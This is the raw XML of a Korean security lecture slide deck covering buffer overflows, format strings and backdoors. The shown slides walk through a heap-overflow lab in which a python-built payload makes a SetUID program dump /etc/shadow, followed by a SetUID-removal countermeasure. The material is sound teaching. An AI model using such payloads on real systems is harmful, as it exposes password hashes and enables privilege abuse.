              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정할 수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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*112+"B"') &gt; 1.txt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 실행 결과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cat 1.txt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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라는 파일을 열 수 없었음을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) /etc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파일 내용이 출력되도록 공격 수행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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>112+"/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow"') &gt; 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD377966-9EB2-46A2-8812-AD29643EC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" t="323" r="721" b="158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504826" y="862012"/>
            <a:ext cx="4852987" cy="2705101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19AB127-0D1E-49DE-AA80-E2C09252F5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="504826" y="3632427"/>
          <a:ext cx="4932807" cy="278427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563084074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2552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791167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="252906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힙의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버퍼 시작 주소로부터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A’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문자가 복사되며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buf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버퍼의 시작 주소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+ 112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‘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복사된다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68446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59393" name="_x603817952">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266AA15A-B8BA-445A-9A33-16961264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7" y="4473906"/>
            <a:ext cx="4593352" cy="180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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E22925-E979-45D6-8626-2DA803E7A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" t="1826" r="101" b="451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="862012"/>
            <a:ext cx="49053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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9FE55-DBD5-4F0D-A63F-B2351D7BB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741" y="2811778"/>
            <a:ext cx="4934204" cy="2746629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DC8520-7C1E-43E7-84E9-467C287FDD75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3523E35-2AE8-4E01-8F25-6D62F827C3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5DA178-FFF2-4F20-95AD-779D82BC8AD3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25D482AD-1BDB-4B00-840E-53F5B98BEC9E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762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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 공격 결과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cat 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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7321A60-9A8B-4DCF-B6BE-E0B5E85C5327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="513016" y="490569"/>
          <a:ext cx="5049584" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5049584">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3417638965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45710"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="22031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strcpy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함수 실행 후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힙의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구조는 다음과 같다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509503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60417" name="_x609432040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A00DFC-BC0A-404C-A5D1-E832A2A5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10" y="1092518"/>
            <a:ext cx="4811713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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696B1E8A-1EFD-4FFC-BD3E-A7127DA4D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6" y="3608229"/>
            <a:ext cx="4992116" cy="27592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682B9-F1E2-456F-BB10-FF556080591D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="61200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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명 입력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$ acheck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/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력된 파일 이름 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 예제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2.txt)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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5316DD-2CD5-490B-83B5-C7C01B0202D0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99825A1-062A-40CE-B920-CD7749C7A752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1437C5-6CDA-4FB6-8C80-D0BAD3A08F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2EADCCBE-7BBA-4A27-B14F-CB5D54F4E419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44337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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EB15F0-8F52-4084-8228-4234399B1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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF –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힙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-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대응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/sec/heap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파일에는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존재한다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버퍼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오버플로우가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발생하더라도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권한이 없는 파일의 내용이 출력되지 않도록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SetUID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u-s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파일명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4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA32BEB-9045-401B-B976-A8DE580F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C69DC5-6D46-4110-B092-F87162F11C2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BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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1">
                    <a:lumMod val="8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BOF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취약점에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250E706-7320-4890-B2A5-9F511E31CF36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6F75AFA-6CA9-432C-B149-D4CF8BED7C7C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1" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F042198-8D3B-42BA-9AB0-F321EFE2D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27DCE4-1233-4F8B-B02D-73786CA1D8E6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414104-8B9C-4CB0-900B-F84D0564BA2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1781417-D03F-4E91-B9D9-1AF2D709571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087AE6-366E-41AB-BDDA-0EE45619FF93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" name="화살표: 오른쪽 24">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78351B86-FFEB-4E07-95F8-5CDDE591EF0F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4417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/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제 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u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap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64827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5" name="Picture 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217BE02-C249-4B5F-B814-9FDE58ECB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" t="2896"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="1327150"/>
            <a:ext cx="3932555" cy="6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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A268674-ACB5-47FC-8FAB-D5A054A14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5" t="7026"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="2770129"/>
            <a:ext cx="3977321" cy="6588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F01A300-EBE6-4B42-B0BD-D37242AA4775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="498209"/>
          <a:ext cx="4932807" cy="4393375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1604440188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504514"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39292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ASLR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활성화로는 대응이 되지 않는다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이유는 다음과 같이 두 버퍼들 간의 거리는 일정하게 유지되기 때문이다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311618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61441" name="_x563165400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC678E34-4942-49FE-B9D0-0104EB14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81" y="1252979"/>
            <a:ext cx="3870325" cy="34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AEABC-BB50-468C-9324-155014192660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5146484"/>
            <a:ext cx="5616792" cy="13425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  </a:t>
            </a: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41548C-2860-4A58-B397-1C2FB1EBFC2D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8D29BBC-7933-42AE-8CC8-7D28590F6264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184F27-96AC-440B-9D1A-6ECD1FEA5C8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화살표: 오른쪽 13">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A543647-2FBE-4C63-8D1D-36F3603F92CC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76954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포맷 스트링</a:t>
              </a:r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97</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="_x381654904" descr="EMB000019180747">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1547C878-9A99-4E42-8A0E-38B2193A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4070250"/>
            <a:ext cx="8280008" cy="27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2387D083-84D0-4C1B-8712-0AB3C0EB70EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995079" y="1870336"/>
            <a:ext cx="8280009" cy="202982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사용자로부터 입력을 받아들이거나 결과를 출력하기 위하여 사용하는 형식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사용시의 오류를 이용하여 시스템의 권한을 획득하는 기법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형태와 길이에 대한 불명확한 정의로 인한 문제점 중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‘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데이터에 형태에 대한 불명확한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’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로 인한 것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75222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포맷 스트링</a:t>
              </a:r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98</a:t>
            </a:fld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BFB502F-150B-4D75-A735-AF3CB5468BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1989641" y="3770338"/>
          <a:ext cx="8136430" cy="264033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844796">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="83967042"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5291634">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1553928112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파라미터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Parameter)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특징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63797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%d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정수형 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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 상수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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(integer)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684203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%f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실수형 상수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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float)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339529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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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lf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실수형 상수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double)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48695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문자 스트링 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((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const)(unsigned) char *)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97730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%u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양의 정수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(10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255635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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="10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〇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양의 정수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(8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536097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%x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양의 정수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(16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921971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문자열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298929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%n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*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 (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쓰인 총 바이트 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700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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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hn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%n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반인 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바이트 단위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9742606"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16654331-D11A-4635-BE2D-FCF8971A50DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995079" y="1870336"/>
            <a:ext cx="8280009" cy="1819512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형태와 길이에 대한 불명확한 정의로 인한 문제점 중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‘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데이터에 형태에 대한 불명확한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’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로 인한 것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Prinrf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()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등의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C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함수 뿐만 아니라 함수 간에 값을 전달하는 선언이 있는 경우에 대해서도 발생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234673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백도어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99</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US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D45B1D6-43AB-413E-BE56-79321C3C5856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995079" y="1870336"/>
            <a:ext cx="8280009" cy="3948300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넷버스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다른 파일은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감영시키지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않지만 인터넷을 통해 외부인이 자신의 컴퓨터로 들어와 파일을 삭제하거나 정보를 빼내어 갈 수 있는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백오리피스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프로그램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11723" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="92"/>
              </a:spcBef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백오리피스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악용의 목적을 위해 만들어진 </a:t>
            </a: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백도어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프로그램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원격지 네트워크에서 사용자가 모르게 정보 수집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 명령어수행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 재구성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네트워크 트래픽 지정변경 등 시스템을 통제 할 수 잇는 클라이언트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/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서버 어플리케이션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5220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7337</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>1523</Paragraphs>
  <Slides>101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2" baseType="lpstr">
      <vt:lpstr>HY견고딕</vt:lpstr>
      <vt:lpstr>HY헤드라인M</vt:lpstr>
      <vt:lpstr>NanumBarunGothic</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>문체부 훈민정음체</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>정보보호 3강</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.2 모바일 운영체제</vt:lpstr>
      <vt:lpstr>3.2 모바일 운영체제</vt:lpstr>
      <vt:lpstr>3.2 모바일 운영체제</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반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3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.1 운영체제 이론 및 일반</vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 </vt:lpstr>
      <vt:lpstr>3.4 서버 보안 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PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF - 힙</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF – 힙 -대응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정보보호 3강</dc:title>
  <dc:creator>Author</dc:creator>
  <cp:lastModifiedBy>Author</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-20T07:34:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-21T01:05:08Z</dcterms:modified>
</cp:coreProperties>
</file>